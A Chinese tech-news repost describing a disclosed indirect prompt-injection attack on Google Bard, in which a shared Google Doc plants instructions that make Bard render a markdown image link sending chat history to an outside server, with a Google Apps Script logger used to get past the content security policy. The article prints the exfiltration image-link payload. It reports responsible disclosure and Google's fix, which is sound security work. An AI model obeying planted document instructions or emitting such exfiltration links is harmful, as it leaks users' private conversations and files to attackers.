您当前的位置:首页 > 电脑百科 > 人工智能

谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

时间:2023-11-20 16:42:12  来源:机器之心Pro  作者:

编辑:佳琪

操控 Bard 的秘密:运用一种叫提示注入(Prompt Injection)的技术,黑客可以只使用自然语言破解人工智能系统。

大型语言模型在生成文本时非常依赖提示词。这种攻击技术对于通过提示词学习模型而言可谓是「以彼之矛,攻己之盾」,是最强长项,同时也是难以防范的软肋。

提示词分为系统指令和用户给出的指令,在自然语言中,这两者难以区分。如果用户有意在输入提示词时,模仿系统指令,那么模型可能在对话里透露一些只有它才知道的「秘密」。

提示注入攻击有多种形式,主要为直接提示注入和间接提示注入。直接提示注入指用户直接向模型输入恶意指令,试图引发意外或有害的行为。间接提示注入指攻击者将恶意指令注入到可能被模型检索或摄入的文档中,从而间接地控制或引导模型。

谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

有网友使用「系统指令」引导 GPT 泄露数据

最近,谷歌 Bard 迎来了一波强大的更新,Bard 增加了拓展功能,支持访问 YouTube,搜索航班和酒店,还能查阅用户的个人文件和邮件。

除此之外,Bard 可以连接到「谷歌全家桶」,访问你的谷歌云盘、文档和邮件!但这同时意味着 Bard 将分析不受信任的数据,容易受间接提示注入的影响。也就是说,不怀好意的人可能通过向你发送电子邮件或强行分享谷歌文档进行间接的提示注入攻击,因为对方发什么样的邮件、文档给你,你是控制不了的,但 Bard 却会无差别访问。

在安全风险分析领域有着 20 年经验的前微软 Azure 安全工程师 Johann Rehberger 体验了 Bard 的全新版本,并测试了被提示注入攻击时,Bard 的数据泄漏风险。

原博客链接:

https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/?continueFlag=53578cc8c5c0a6a19c571a1fa6bcab85

Johann 首先快速验证了提示注入的可行性。他通过让 Bard 分析旧的 YouTube 视频,并使用谷歌文档进行测试测试结果显示,Bard 确实按照他的额外提示进行了操作,这证明了接下来要进行的测试的可行性。

谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

Bard 的漏洞:图像 Markdown 注入

在得知 Bard 可以被提示注入后,Johann 开始了进一步的研究。

LLM 应用中的一个常见漏洞是通过渲染超链接和图像来泄露聊天历史记录。问题是,这如何适用于谷歌 Bard?

当谷歌的大模型返回文本时,它可以返回 markdown 元素,Bard 将其呈现为 html! 这包括渲染图像的功能。

想象一下谷歌的大模型返回这样的文本:

![Data Exfiltration in Progress](https://wuzzi.NET/logo.png?goog=[DATA_EXFILTRATION])

这将呈现为 HTML 图像标记,其 src 属性指向 attacker 服务器。

浏览器会自动连接到 URL,无需用户交互即可加载图片。借助 LLM 的强大功能,我们可以在聊天上下文中总结或访问以前的数据,并将其相应地附加到 URL 中。

在编写漏洞利用程序时,Johann 很快就开发出了一个提示注入有效载荷,它可以读取对话的历史记录,并形成一个包含该历史记录的超链接。然而,谷歌的内容安全策略(CSP)阻止了图像的渲染。这对攻击者来说是一个难题。

谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

绕过内容安全策略

要从攻击者控制的服务器渲染图片,并不容易。谷歌的内容安全策略阻止从任意源加载图片。CSP 包含诸如 *.google.com 和 *.googleusercontent.com 之类的源,相当广泛。这意味着应该能找到一种绕过方法。

研究后,Johann 得知了 Google Apps Script,这或许可以绕过 CSP 。

谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

如此一来,Bard Logger 可以在 Apps Script 中完成了。这个 Logger 将所有附加到调用 URL 的查询参数写入一个 Google Doc,而它正是外泄的目的地。

谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

起初,Johann 以为这个方法并不可行,但他发现点击了几下 Apps Script 用户界面后,他找到了一个无需验证的设置。

接下来,一切准备工作就绪:

确认了谷歌 Bard 易受通过扩展程序数据间接注入提示的影响

谷歌 Bard 有允许零点击渲染图片的漏洞

一个写有提示注入指令的恶意谷歌文档

一个位于 google.com 上的日志端点,用于在图像加载时接收数据。

泄露过程

Johann 提供了他让 Bard 泄露数据的全过程。

原视频链接:

https://www.youtube.com/watch?v=CKAED_jRaxw&t=4s

首先,和 Bard 先聊一些日常:

谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

用户访问一个谷歌文档(The Bard2000),这导致攻击者指令注入和图像渲染。

谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

攻击者通过 Apps Script 中的脚本将数据接收到谷歌文档。

谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

以下是 Johann 用于「提示注入」的谷歌文档:

谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险

谷歌的修复

这个安全问题已经于 2023 年 9 月 19 日报告给 Google VRP。

10 月 19 日,Johann 想要在 Ekoparty 2023 中进行演示,所以询问了关于这个漏洞的情况。Google 确认已经修复。目前还不太清楚谷歌采取了何种修复措施。但 CSP 没有修改,仍然可以渲染图像。因此,这可能是已经采取了一些过滤措施,以防止将数据插入到 URL 中。

参考链接:

https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/?continueFlag=53578cc8c5c0a6a19c571a1fa6bcab85



Tags:自然语言   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,不构成投资建议。投资者据此操作,风险自担。如有任何标注错误或版权侵犯请与我们联系,我们将及时更正、删除。
▌相关推荐
了解“自然语言处理架构师”的最新考试流程、条件,以及就业前景
随着人工智能技术的飞速发展,自然语言处理(NLP)已成为当今科技领域的热点之一。自然语言处理架构师作为这一领域中的专业人才,更是备受关注。那么,如何成为一名自然语言处理架构...【详细内容】
2024-01-04  Search: 自然语言  点击:(51)  评论:(0)  加入收藏
自然语言处理中的句法分析方法研究与实现
自然语言处理(NLP)中的句法分析方法是NLP领域的重要研究内容之一,它旨在通过对句子结构的分析和理解,揭示句子中单词之间的语法关系,为后续的语义理解和信息提取提供基础支撑。本...【详细内容】
2024-01-04  Search: 自然语言  点击:(55)  评论:(0)  加入收藏
自然语言处理NLTK库介绍
Natural Language Processing,简称NLP,涉及语言学、计算机科学和人工智能等。...【详细内容】
2024-01-02  Search: 自然语言  点击:(41)  评论:(0)  加入收藏
面向自然语言处理的预训练模型技术研究
近年来,随着自然语言处理(NaturalLanguageProcessing,NLP)领域的快速发展,预训练模型技术成为了研究的热点。预训练模型可以通过大规模无标注文本的学习,获取丰富的语义和语法知识...【详细内容】
2024-01-02  Search: 自然语言  点击:(70)  评论:(0)  加入收藏
研究基于迁移学习的自然语言处理模型
自然语言处理(NaturalLanguage Processing,NLP)是人工智能领域的重要分支,致力于使计算机能够理解和处理人类语言。然而,由于不同领域的文本数据具有特定的语义和结构特征,传统的...【详细内容】
2023-12-18  Search: 自然语言  点击:(133)  评论:(0)  加入收藏
谷歌Bard「破防」,用自然语言破解,提示注入引起数据泄漏风险
编辑:佳琪操控 Bard 的秘密:运用一种叫提示注入(Prompt Injection)的技术,黑客可以只使用自然语言破解人工智能系统。大型语言模型在生成文本时非常依赖提示词。这种攻击技术对于...【详细内容】
2023-11-20  Search: 自然语言  点击:(184)  评论:(0)  加入收藏
训练语料在自然语言处理中的重要性
自然语言处理(NaturalLanguageProcessing,NLP)是一门研究人类语言与计算机之间交互的学科,它涉及了文本分析、语义理解、机器翻译、情感分析等多个领域。在NLP的研究和应用中,训...【详细内容】
2023-11-20  Search: 自然语言  点击:(163)  评论:(0)  加入收藏
探索GPTQ算法的威力:革新自然语言处理
自然语言处理(NaturalLanguageProcessing,简称NLP)是一门研究如何使计算机能够理解和处理人类语言的学科。近年来,随着人工智能技术的迅猛发展,GPTQ(GenerativePre-trainedTransfo...【详细内容】
2023-11-20  Search: 自然语言  点击:(177)  评论:(0)  加入收藏
自然语言数据处理:ChatGPT与DataFocus的震撼力量
在大数据时代,自然语言处理(NLP)技术对于数据分析和商业智能应用具有重要意义。当我们将ChatGPT和DataFocus结合使用时,可以大大提高自然语言处理的效果,并为企业提供更高效、更...【详细内容】
2023-11-17  Search: 自然语言  点击:(218)  评论:(0)  加入收藏
GPTQ算法的未来:自然语言处理的进展与挑战
自然语言处理(NaturalLanguageProcessing,NLP)是人工智能领域的重要研究方向,旨在使计算机能够理解和处理人类语言。近年来,GPTQ(GenerativePre-trainedTransformer-Q)算法作为一种...【详细内容】
2023-11-17  Search: 自然语言  点击:(211)  评论:(0)  加入收藏
▌简易百科推荐
多方热议人工智能产业新机遇
编者按  从前沿科技展会到高层对话平台,从上海、重庆到博鳌,从线上到线下……一场场高规格、大规模的盛会中,人工智能正在成为各界热议的高频词。赋能千...【详细内容】
2024-04-08    中国家电网  Tags:人工智能   点击:(4)  评论:(0)  加入收藏
​人形机器人时代来了吗
日前,由中国人形机器人(11.080, -0.05, -0.45%)百人会主办的人形机器人大赛在北京经济技术开发区开赛。工作人员向参观者展示一款人形机器人。参观者与一款陪护型人形机器人...【详细内容】
2024-04-08    中国青年报  Tags:​人形机器人   点击:(4)  评论:(0)  加入收藏
AI重塑社交:腾讯与字节跳动的新赛场
文|新火种 一号编辑|美美最近,腾讯和字节跳动这两大互联网巨头几乎同步推出了各自的AI社交产品,尽管腾讯和字节跳动在前段时间刚刚“破冰”,但这一举措不仅意味着这两大巨头之...【详细内容】
2024-04-07    蓝鲸财经  Tags:AI   点击:(7)  评论:(0)  加入收藏
第一批用 Kimi 做内容的网红已经杀疯了
作者:王东东 文章来自:斗战圣佛小组技术信仰派 VS 市场信仰派 朱啸虎和月之暗面老板杨植麟在前几天有一场不算 battle 的 battle。battle 的争论点是:大模型有没有戏。技术派...【详细内容】
2024-04-04    斗战圣佛小组  Tags:Kimi   点击:(4)  评论:(0)  加入收藏
昆仑万维发布面向人工智能时代的六条人才宣言
过去的一年多,是人工智能取得非凡进步的一年。在这充满突破性技术飞跃和备受争议的一年里,我们见证了人工智能的快速发展和广泛的影响,人工智能已经迅速地融入了我们的生活,深刻...【详细内容】
2024-04-03    砍柴网  Tags:昆仑万维   点击:(7)  评论:(0)  加入收藏
AI干掉声优?音频大模型追逐“图灵时刻”
七十年前,“人工智能之父”图灵提出,如果人无法判断屏幕的另一侧究竟是人还是机器,就证明机器具备了人一样的智能。这一经典的图灵测试如同北斗星一般,指引着AI行业的工作者们不...【详细内容】
2024-04-03    第一财经网  Tags:AI   点击:(5)  评论:(0)  加入收藏
生成式人工智能有哪些新趋势?
相较于去年,当下我们所能体验的人工智能技术的范围已经大幅提升。从搜索引擎、电商平台再到社媒平台,只要是以搜索结果为导向的内容,都会出现它的身影。但其实,人工智能的应用场...【详细内容】
2024-04-03  品谈教师帮    Tags:人工智能   点击:(6)  评论:(0)  加入收藏
AI世界的新难题:互联网的信息不够用了!
高质量数据的紧缺正成为AI发展的重要障碍。4月1日,据媒体报道,随着OpenAI、Google等企业不断深入发展AI技术,科技巨头们遇到了一个新问题:现有的互联网信息量可能不足以支撑他们...【详细内容】
2024-04-02  硬AI    Tags:AI   点击:(6)  评论:(0)  加入收藏
今天起,ChatGPT无需注册就能用了!
 来源:量子位    金磊 克雷西 发自 凹非寺  就在刚刚,OpenAI狠狠地open了一把:从今天起,ChatGPT打开即用,无需再注册帐号和登录了!  像这样,直接登录网站,然后就可以开启对...【详细内容】
2024-04-02    量子位   Tags:ChatGPT   点击:(7)  评论:(0)  加入收藏
AI时代,面对死亡有了第二种选择?
今年春节期间,罗佩玺瞒着妈妈用AI技术“复活”了外婆,她将妈妈现在的模样和外婆留下的老照片合成在一起。时隔60多年,妈妈和外婆终于又“见面”了,这是她送给妈妈的生日礼物。收...【详细内容】
2024-04-02    中国青年报  Tags:AI时代   点击:(7)  评论:(0)  加入收藏
站内最新
站内热门
站内头条